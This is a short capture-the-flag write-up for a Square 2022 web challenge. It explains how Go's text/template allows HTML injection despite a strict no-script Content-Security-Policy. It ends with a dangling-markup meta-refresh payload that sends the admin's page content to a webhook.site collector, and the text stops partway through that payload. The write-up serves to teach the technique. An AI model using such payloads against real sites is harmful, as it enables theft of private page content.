Square 2022 Web CTF challenge
Reverting back to the ye-olde days, absolutely no javascript is allowed on my pure site. No vulnerabilities allowed here, no sir!
The flag is stored as a post on the admin user's profile. When you share a note to the admin, it'll show up in the same page as the post ("/"), and the admin bot will visit it.
The site (intentionally) uses Go's text/template instead of html/template package. This allows for arbitrary HTML injection to occur on the site, as text/template doesn't attempt to sanitize at all. The site also sets the following security headers:
Content-Security-Policy: "default-src 'self'; script-src 'none'"
X-XSS-Protection: 0
X-Content-Type-Options: "nosniff"
X-Frame-Options: "sameorigin"
This has the following (important to note) consequences:
- No javascript is allowed to execute at all on the page.
- Unsafe-inline isn't set, so inline <style></style> tags are also blocked.
The flag is in the admin post below. To leak the post, you can do dangling markdown as follows:
<meta http-equiv="refresh" content='0; url=https://webhook.site/#!/your_webhook_site_id?